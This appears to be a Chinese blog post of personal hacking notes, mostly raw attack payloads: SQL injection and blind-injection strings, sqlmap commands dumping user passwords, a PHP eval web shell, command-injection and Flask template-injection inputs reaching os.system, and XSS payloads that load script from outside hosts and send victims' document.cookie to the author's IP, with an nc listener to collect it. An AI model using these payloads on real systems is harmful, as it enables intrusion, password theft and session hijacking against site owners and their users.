• 安全笔记


    sql注入

    1---判断是否存在注入(字符型or数字型)
    1' or 1=1#

    2---猜测语句中字段数
    1' order by 1
    1' order by 2
    1' order by 3
    ...
    2得到字段数
    或者
    1' union select 1#
    1' union select 1,2#
    1' union select 1,2,3#
    ...
    得到字段数

    3---得到字段顺序
    1' union select 1,2 #

    4---获取当前数据库
    1' union select 1,database()#

    5---获取数据库中表名
    1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#


    1%27%2F**%2FUNIunionON%2F**%2FSELEselectCT%2F**%2F*%2F**%2FfrFROMom%2F**%2F%27fl4g


    获取数据库中表名
    0' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
    查表中列名
    0' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#
    查表中某一列信息
    0' union select 1,password from users#

    找到显示位

    0' union select 1,2#

    绕过姿势:
    注释符代替空格,分割关键词
    大小写绕过关键词
    双写关键词绕过

    盲注
    显示表名


    sqlmap
    先使用框输入并提交,得到url
    1~ 找到数据库
    windows pyhton sqlmap.py -u "url" --cookie="security=low;PHPSESSID=xx" --dbs
    linux sqlmap -u "url" --cookie="security=low;PHPSESSID=xxx" --dbs
    2~ 指定数据库,找到所有的表
    pyhton sqlmap.py -u "url" --cookie="security=low;PHPSESSID=xx" -D dvwa --tables

    3~指定数据库指定表,找到所有的columns
    pyhton sqlmap.py -u "url" --cookie="security=low;PHPSESSID=xx" -D dvwa -T users --columns

    4~
    pyhton sqlmap.py -u "url" --cookie="security=low;PHPSESSID=xx" -D dvwa -T users -C password --dump


    暴库搜密码
    pyhton sqlmap.py -u "url" --cookie="security=low;PHPSESSID=xx" --dbs
    pyhton sqlmap.py -u "url" --cookie="security=low;PHPSESSID=xx" -D dvwa --tables
    pyhton sqlmap.py -u "url" --cookie="security=low;PHPSESSID=xx" -D dvwa -T users --columns
    pyhton sqlmap.py -u "url" --cookie="security=low;PHPSESSID=xx" -D dvwa -T users -C user,password --dump


    源码泄露
    dirsarch 爆破网站查找隐藏文件,黑盒变白盒

    已有则利用木马
    <?php @eval($_GET[x]); ?>
    监控x变量,执行
    注意去掉#
    得到的路径复制到后面,加上参数
    eval执行的是命令,加上分号
    phpinfo中disable-functions显示禁用函数

    csrf

    构造连接,结合其他方式出发连接,更改密码,添加管理员等


    sql盲注
    1' and '1' = '1
    数据库长度
    1' and length(database())=4#

    1' and ascii(mid(database(),1,1))=109#
    1' and ascii(mid(database(),2,1))=109#
    ...

    mysql
    if
    mysql有三个参数


    命令行注入

    127.0.0.1|dir
    过滤'| '
    构造127.0.0.1|| dir


    上传文件&包含文件
    可以先上传木马图片,再包含这个木马图片,从而执行这个图片


    python flask利用漏洞
    404的
    {{ 7*7 }}
    得到/49
    {{ [].__class__.__mro__[-1].__subclass__()[40].read() }}

    {{ [].__class__.__mro__[-1].__subclass__()[71].__init__.__globals__['os'].system('ls') }}


    xss

    如何使用:
    将如下代码植入怀疑出现xss的地方(注意'的转义),即可在 项目内容 观看XSS效果。

    </tExtArEa>'"><sCRiPt sRC=https://xss.pt/W7Y4></sCrIpT>
    或者

    </tEXtArEa>'"><img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22https%3A%2F%2Fxss.pt%2FW7Y4%22%2BMath.random%28%29%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//>
    再或者以你任何想要的方式插入

    https://xss.pt/W7Y4
    再或者以你任何想要的方式插入

    <img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
    ↓↓↓!~极限代码~!(可以不加最后的>回收符号,下面代码已测试成功)↓↓↓

    <sCRiPt/SrC=//https://xss.pt/W7Y4>

    xss----------------------
    如何使用:
    将如下代码植入怀疑出现xss的地方(注意'的转义),即可在 项目内容 观看XSS效果。

    <script src=http://xsspt.com/l76Bsh?1536130298></script>
    或者以你任何想要的方式插入

    http://xsspt.com/l76Bsh?1536130298
    *************************************************网址缩短*************************************************

    再或者以你任何想要的方式插入

    <script src=http://t.cn/RshW7Ua></script>
    再或者以https,http双支持的方式插入

    <script src=//xsspt.com/l76Bsh></script>
    再或者以你任何想要的方式插入

    <img src=x onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPSdodHRwOi8veHNzcHQuY29tL2w3NkJzaD8nK01hdGgucmFuZG9tKCk='))>

    xss----------------------
    利用我的服务器
    写好了evil.js
    有xss的地方,加上
    http://132.232.158.195/evil.js
    就可以在服务器789端口监听到cookie
    服务器:
    sudo nc -lvvp 789
    监听
    使用
    <script src=http://132.232.158.195/evil.js></script>

    xss payload整理
    闭合textarea标签
    '></textarea></form><svg onload="s=createElement('script');body.appendChild(s);s.src='http://132.232.158.195/log?'+escape(document.cookie);">
    '></textarea></form><script src='http://132.232.158.195/evil.js'></script>


    img src处的脚本不会执行

    var/log/apache2 看log日志

    chrome 检测反射型xss

    var img=createElement("img");
    img.src="url:8000/log?" + escape(document.cookie);
    document.body.appendChild(img);

  • 相关阅读:
    力扣236题、235(二叉树最近公共祖先)
    力扣222题(完全二叉树的节点个数)
    力扣130题、990题(并查集算法)
    力扣855题(考场就座)
    力扣659题(分割数组为连续子数组)
    力扣435题(区间调度问题)
    【转】编程之:EXPORT_SYMBOL使用
    【转】shell工具之:常用shell脚本命令详细
    【转】vim工具命令之:添加行号和删除行号
    BUG之【虚拟机报错】:Centos出现 rm: cannot remove x: Read-only file system 的总结
  • 原文地址:https://www.cnblogs.com/gudygudy/p/9638419.html
Copyright © 2020-2023  润新知